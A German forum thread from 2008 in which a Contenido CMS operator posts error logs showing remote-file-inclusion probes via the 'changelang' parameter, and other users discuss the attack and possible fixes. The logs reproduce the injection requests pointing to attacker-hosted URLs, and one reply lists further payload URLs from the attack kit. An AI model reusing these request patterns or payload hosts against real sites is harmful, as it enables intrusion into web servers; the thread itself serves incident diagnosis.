URL-Injection? ..

Matz82 · Beitrag von **Matz82** » Do 10. Jan 2008, 00:18

Hallo,
ich hab heute mal meine Error-Log durchforstet, weil ich ein Problem mit den Zugriffsrechten für den Upload von Bildern habe.

Beim durchsuchen der Error-Log ist mir aber der eine oder andere Eintrag komisch vorgekommen. Weiss nicht wieso, ist nur eine Vermutung.
Vielleicht ist es auch nicht weiter dramatisch. Schaut mal selbst:

Code: Alles auswählen

[07-Jan-2008 02:37:21] /xxx/xxx/front_content.php?idart=146&changelang=http%3A%2F%2Fda.bluebananas.net%2Fville%2Fimages%2Ftuno%2Fmibufat%2F&client=3&sse_idupl=581 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://da.bluebananas.net/ville/images/tuno/mibufat/' at line 6
SELECT idright 
					FROM con_rights AS A,
						 con_actions AS B,
						 con_area AS C
					 WHERE B.name = 'front_allow' AND C.name = 'str' AND A.user_id = 'nobody' AND A.idcat = '115'
							AND A.idarea = C.idarea AND B.idaction = A.idaction AND A.idlang = http://da.bluebananas.net/ville/images/tuno/mibufat/

Was soll das heissen und warum wird da eine fremde URL angezeigt?
Spambots oder sowas??? ..

Vielleicht kennt ihr sowas auch?

timo.nuros · Beitrag von **timo.nuros** » Do 10. Jan 2008, 00:58

Da versucht wohl einer eine URL-Injection, schaut aber nicht so aus, als ob es erfolgreich ist..

Matz82 · Beitrag von **Matz82** » Do 10. Jan 2008, 07:28

öhm..

ich hab hier mal meine ganze Error-Log der letzten 2 Wochen.
Mit dem URL-Injection kenn ich mich absolut nicht aus.

Code: Alles auswählen

gJEdMT0JBTFNbJ2NmZ0NsaWVudCddWyczJ11bJ3VwbCddWydmcm9udG VuZHBhdGgnXSA9ICd1cGxvYWQvJzsgJEdMT0JBTFNbJ2NmZ0NsaWVu dC ddWyczJ11bJ2NzcyddID0gYXJyYXkoKTsgJEdMT0JBTFNbJ2NmZ0NsaWVu dCddWyczJ11bJ2NzcyddWydwYXRoJ10gPSAnL2hvbWUvc3RyYXRvL3d3d y9hay93d3cuYWstemVudC5kZS9odGRvY3MvYWstemVudC9hay1jbXMvY Wt6ZW50L2Nzcy8nOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzMnXVsnan MnXSA9IGFycmF5KCk7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMyddW ydqcyddWydwYXRoJ10gPSAnL2hvbWUvc3RyYXRvL3d3dy9hay93d3cuYW stmVudC5kZS9odGRvY3MvYWstemVudC9hay1jbXMvYWt6ZW50L2pzLyc 7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMyddWyd0cGwnXSA9IGFycm F5KCk7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMyddWyd0cGwnXVsnc GF0aCddID0gJy9ob21lL3N0cmF0by93d3cvYWsvd3d3LmFrLXplbnQuZGU vaHRkb2NzL2FrLXplbnQvYWstY21zL2FremVudC90ZW1wbGF0ZXMvJzsgJ EdMT0JBTFNbJ2NmZ0NsaWVudCddWyc1J10gPSBhcnJheSgpOyAkR0xPQ kFMU1snY2ZnQ2xpZW50J11bJzUnXVsncGF0aCddID0gYXJyYXkoKTsgJEd MT0JBTFNbJ2NmZ0NsaWVudCddWyc1J11bJ3BhdGgnXVsnZnJvbnRlbmQ nXSA9ICcvaG9tZS9zdHJhdG8vd3d3L2FrL3d3dy5hay16ZW50LmRlL2h0Z G9jcy9hay16ZW50L2FrLWNtcy9nYXJ0Lyc7ICRHTE9CQUxTWydjZmdDbG llbnQnXVsnNSddWydwYXRoJ11bJ2h0bWxwYXRoJ10gPSAnaHR0cDovL3d 3dy5hay16ZW50LmRlL2FrLWNtcy9nYXJ0Lyc7ICRHTE9CQUxTWydjZmdD bGllbnQnXVsnNSddWydpbWFnZXMnXSA9ICdodHRwOi8vd3d3LmFrLXplb nQuZGUvYWstY21zL2dhcnQvaW1hZ2VzLyc7ICRHTE9CQUxTWydjZmdDb GllbnQnXVsnNSddWyd1cGxvYWQnXSA9ICd1cGxvYWQvJzsgJEdMT0JBTF NbJ2NmZ0NsaWVudCddWyc1J11bJ2h0bWxwYXRoJ10gPSBhcnJheSgpOy AkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzUnXVsnaHRtbHBhdGgnXVsnZn JvbnRlbmQnXSA9ICdodHRwOi8vd3d3LmFrLXplbnQuZGUvYWstY21zL2dh cnQvJzsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWyc1J11bJ3VwbCddID0gY XJyYXkoKTsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWyc1J11bJ3VwbCddW ydwYXRoJ10gPSAnL2hvbWUvc3RyYXRvL3d3dy9hay93d3cuYWstemVudC 5kZS9odGRvY3MvYWstemVudC9hay1jbXMvZ2FydC91cGxvYWQvJzsgJ EdMT0JBTFNbJ2NmZ0NsaWVudCddWyc1J11bJ3VwbCddWydodG1scGF0 aCddID0gJ2h0dHA6Ly93d3cuYWstemVudC5kZS9hay1jbXMvZ2FydC91c GxvYWQvJzsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWyc1J11bJ3VwbCdd Wydmcm9udGVuZHBhdGgnXSA9ICd1cGxvYWQvJzsgJEdMT0JBTFNbJ2N mZ0NsaWVudCddWyc1J11bJ2NzcyddID0gYXJyYXkoKTsgJEdMT0JBTFNb J2NmZ0NsaWVudCddWyc1J11bJ2NzcyddWydwYXRoJ10g PSAnL2hvbWUvc3RyYXRvL3d3dy9hay93d3cuYWstemVudC5kZS9odGRv Y3MvYWstemVudC9hay1jbXMvZ2FydC9jc3MvJzsgJEdMT0JBTFNbJ2NmZ 0NsaWVudCddWyc1J11bJ2pzJ10gPSBhcnJheSgpOyAkR0xPQkFMU1snY2 ZnQ2xpZW50J11bJzUnXVsnanMnXVsncGF0aCddID0gJy9ob21lL3N0cmF0 by93d3cvYWsvd3d3LmFrLXplbnQuZGUvaHRkb2NzL2FrLXplbnQvYWstY 21zL2dhcnQvanMvJzsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWyc1J11bJ3 RwbCddID0gYXJyYXkoKTsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWyc1J11 bJ3RwbCddWydwYXRoJ10gPSAnL2hvbWUvc3RyYXRvL3d3dy9hay93d3 cuYWstemVudC5kZS9odGRvY3MvYWstemVudC9hay1jbXMvZ2FydC90 ZW1wbGF0ZXMvJzsgJEdMT0JBTFNbJ2VycnNpdGVfaWRjYXQnXSA9IGFy cmF5KCk7ICRHTE9CQUxTWydlcnJzaXRlX2lkY2F0J11bJzEnXSA9ICcwJ zsgJEdMT0JBTFNbJ2VycnNpdGVfaWRjYXQnXVsnMyddID0gJzAnOyAkR 0xPQkFMU1snZXJyc2l0ZV9pZGNhdCddWyc1J10gPSAnMCc7ICRHTE9C QUxTWydlcnJzaXRlX2lkYXJ0J10gPSBhcnJheSgpOyAkR0xPQkFMU1snZX Jyc2l0ZV9pZGFydCddWycxJ10gPSAnMCc7ICRHTE9CQUxTWydlcnJzaXR lX2lkYXJ0J11bJzMnXSA9ICcwJzsgJEdMT0JBTFNbJ2VycnNpdGVfaWRhcnQn XVsnNSddID0gJzAnOyAkR0xPQkFMU1sncmVtYWtlU3RyVGFibGUnXSA9IC cxJzsgJEdMT0JBTFNbJ1N0clRhYmxlQ2xpZW5 .......(geht noch weiter dieser codemüll....', '20071217121240')

[06-Jan-2008 09:56:58] /xx/xx/front_content.php?idart=146&changelang=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F&client=3&sse_idupl=581 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://www.thoseguysfilms.com/forums/templates/subSilver/images/uza/
SELECT idright 
					FROM con_rights AS A,
						 con_actions AS B,
						 con_area AS C
					 WHERE B.name = 'front_allow' AND C.name = 'str' AND A.user_id = 'nobody' AND A.idcat = '115'
							AND A.idarea = C.idarea AND B.idaction = A.idaction AND A.idlang = http://www.thoseguysfilms.com/forums/templates/subSilver/images/uza/laqipu/
[06-Jan-2008 09:56:58] /xx/xx/front_content.php?idart=146&changelang=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F&client=3&sse_idupl=581 next_record called with no query pending.
[06-Jan-2008 09:56:59] /xx/xx/front_content.php?idart=146&changelang=http%3A%2F%2Fwww.slda.info%2Fimages%2Flebun%2Fisexopo%2F&client=3&sse_idupl=581 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://www.slda.info/images/lebun/isexopo/' at line 6
SELECT idright 
					FROM con_rights AS A,
						 con_actions AS B,
						 con_area AS C
					 WHERE B.name = 'front_allow' AND C.name = 'str' AND A.user_id = 'nobody' AND A.idcat = '115'
							AND A.idarea = C.idarea AND B.idaction = A.idaction AND A.idlang = http://www.slda.info/images/lebun/isexopo/
[06-Jan-2008 09:56:59] /xx/xx/front_content.php?idart=146&changelang=http%3A%2F%2Fwww.slda.info%2Fimages%2Flebun%2Fisexopo%2F&client=3&sse_idupl=581 next_record called with no query pending.
[06-Jan-2008 09:57:06] /xx/xx/front_content.php?idart=146&changelang=http%3A%2F%2Fwww.antonioariso.com%2Fofertas%2Fnoc%2Fifobone%2F&client=3&sse_idupl=542 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://www.antonioariso.com/ofertas/noc/ifobone/' at line 6
SELECT idright 
					FROM con_rights AS A,
						 con_actions AS B,
						 con_area AS C
					 WHERE B.name = 'front_allow' AND C.name = 'str' AND A.user_id = 'nobody' AND A.idcat = '115'
							AND A.idarea = C.idarea AND B.idaction = A.idaction AND A.idlang = http://www.antonioariso.com/ofertas/noc/ifobone/
[06-Jan-2008 09:57:06] /xx/xx/front_content.php?idart=146&changelang=http%3A%2F%2Fwww.antonioariso.com%2Fofertas%2Fnoc%2Fifobone%2F&client=3&sse_idupl=542 next_record called with no query pending.
[06-Jan-2008 09:57:09] /xx/xx/front_content.php?idart=146&changelang=http%3A%2F%2Fwww.kidspace-epe.com%2Fphotos%2Fenahur%2Favid%2F&client=3&sse_idupl=542 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://www.kidspace-epe.com/photos/enahur/avid/' at line 6
SELECT idright 
					FROM con_rights AS A,
						 con_actions AS B,
						 con_area AS C
					 WHERE B.name = 'front_allow' AND C.name = 'str' AND A.user_id = 'nobody' AND A.idcat = '115'
							AND A.idarea = C.idarea AND B.idaction = A.idaction AND A.idlang = http://www.kidspace-epe.com/photos/enahur/avid/
[06-Jan-2008 09:57:09] /xx/xx/front_content.php?idart=146&changelang=http%3A%2F%2Fwww.kidspace-epe.com%2Fphotos%2Fenahur%2Favid%2F&client=3&sse_idupl=542 next_record called with no query pending.
[07-Jan-2008 02:37:09] /xx/xx/front_content.php?idart=146&changelang=http%3A%2F%2Fwww.beyonddesigners.com%2Filuminacion%2Fcommon%2Fxudev%2Fjoxiqum%2F&client=3&sse_idupl=542 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://www.beyonddesigners.com/iluminacion/common/xudev/joxiqum/' at
SELECT idright 
					FROM con_rights AS A,
						 con_actions AS B,
						 con_area AS C
					 WHERE B.name = 'front_allow' AND C.name = 'str' AND A.user_id = 'nobody' AND A.idcat = '115'
							AND A.idarea = C.idarea AND B.idaction = A.idaction AND A.idlang = http://www.beyonddesigners.com/iluminacion/common/xudev/joxiqum/
[07-Jan-2008 02:37:09] /xx/xx/front_content.php?idart=146&changelang=http%3A%2F%2Fwww.beyonddesigners.com%2Filuminacion%2Fcommon%2Fxudev%2Fjoxiqum%2F&client=3&sse_idupl=542 next_record called with no query pending.
[07-Jan-2008 02:37:21] /xx/xx/front_content.php?idart=146&changelang=http%3A%2F%2Fda.bluebananas.net%2Fville%2Fimages%2Ftuno%2Fmibufat%2F&client=3&sse_idupl=581 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://da.bluebananas.net/ville/images/tuno/mibufat/' at line 6
SELECT idright 
					FROM con_rights AS A,
						 con_actions AS B,
						 con_area AS C
					 WHERE B.name = 'front_allow' AND C.name = 'str' AND A.user_id = 'nobody' AND A.idcat = '115'
							AND A.idarea = C.idarea AND B.idaction = A.idaction AND A.idlang = http://da.bluebananas.net/ville/images/tuno/mibufat/
[07-Jan-2008 02:37:21] /xx/xx/front_content.php?idart=146&changelang=http%3A%2F%2Fda.bluebananas.net%2Fville%2Fimages%2Ftuno%2Fmibufat%2F&client=3&sse_idupl=581 next_record called with no query pending.

Die Seite mit der ID-Cat 115 bezieht sich auf eine Seite, wo ich das Downloadmodul habe. Auch sieht man da die Anzahl der Downloads.
Es ist das Downloadmodul von Stefan Seifarth
<info@polycoder.de>
Version: 0.2

wosch · Beitrag von **wosch** » Do 10. Jan 2008, 09:45

timo.nuros hat geschrieben: schaut aber nicht so aus, als ob es erfolgreich ist..

Wäre ich mir nicht so sicher (17.12.2007 meine ich)

Das ist ein Baukastensystem das es auf upload-Verzeichnisse abgesehen hat.

Quelltext ansehen!!!

http://www.slda.info/images/lebun/hine/a/

http://www.slda.info/images/lebun/hine/b/

http://www.slda.info/images/lebun/hara/

So sieht es dann aus:
http://www.kreis012.de/berichte/2006/namogofer.php
oder so
http://mail.ccsystem.cz/servery/www.sea ... dmin-2.9.0&

Matz82 · Beitrag von **Matz82** » Do 10. Jan 2008, 10:19

Und wie bereinige ich das nun oder finde die "schwachstelle"??? ...
mit sowas hab ich absolut noch null erfahrung

...

Kann es daher auch sein, dass ich nichts mehr hochladen kann? und wenn ich eine Datei aus dem upload-ordner löschen möchte, dass dann dateien wie ".nfsB74305" übrig bleiben??

Contenider · Beitrag von **Contenider** » Do 10. Jan 2008, 10:43

http://contenido.org/forum/viewtopic.php?t=18795

dann Neuinstallation und anschließend

http://contenido.org/forum/viewtopic.php?t=18791

Matz82 · Beitrag von **Matz82** » Do 10. Jan 2008, 10:46

...--> ein schrei á la hollywood "NNNeeeeeeiiiiiiinnnnn ...verdammt!" ..

sowas hab ich schon befürchtet

wosch · Beitrag von **wosch** » Do 10. Jan 2008, 11:21

Matz82 hat geschrieben:Und wie bereinige ich das nun oder finde die "schwachstelle"??? ...

Frag f4b oder Holger.
Ich warte auch schon ewig auf das Konzept von f4b mit dem sie Sicherheit glaubwürdig verkaufen wollen!!!

Beitrag von **emergence** » Do 10. Jan 2008, 11:39

@Matz82
welche contenido version ?

Matz82 · Beitrag von **Matz82** » Do 10. Jan 2008, 12:10

emergence hat geschrieben:@Matz82
welche contenido version ?

Hallo Emergence .. ich habe die Contenido Version 4.6.23

wosch · Beitrag von **wosch** » Do 10. Jan 2008, 12:19

Matz82 hat geschrieben:.. ich habe die Contenido Version 4.6.23

Ach ...
Und ich dachte

Code: Alles auswählen

Diese Website ist mit unserem Content Management System erstellt worden.

In der 4.6.23 sollte keine URL-Injection mehr möglich sein.

Matz82 · Beitrag von **Matz82** » Do 10. Jan 2008, 12:21

Code: Alles auswählen

Diese Website ist mit unserem Content Management System erstellt worden.

Jupp, mit dem welches wir benutzen -> Contenido

.. steht auch in einer rubrik wo wir contenido vorstellen

EDIT: ne, das ist grad offline ^^

Contenider · Beitrag von **Contenider** » Do 10. Jan 2008, 13:44

Hast Du die aktuelle Version von einer Version unter 4.6.15 aktualisiert?

Matz82 · Beitrag von **Matz82** » Do 10. Jan 2008, 14:02

Nein,
ich hatte die Version 4.6.22 auf 4.6.23 geupdatet.

Beitrag von **Dodger77** » Do 10. Jan 2008, 15:03

An der "front_content.php" im Mandantenordner sind auch keine Änderungen durchgeführt oder eine alte Version davon genommen worden?
Wie sehen denn dort die Zeile 119ff. aus?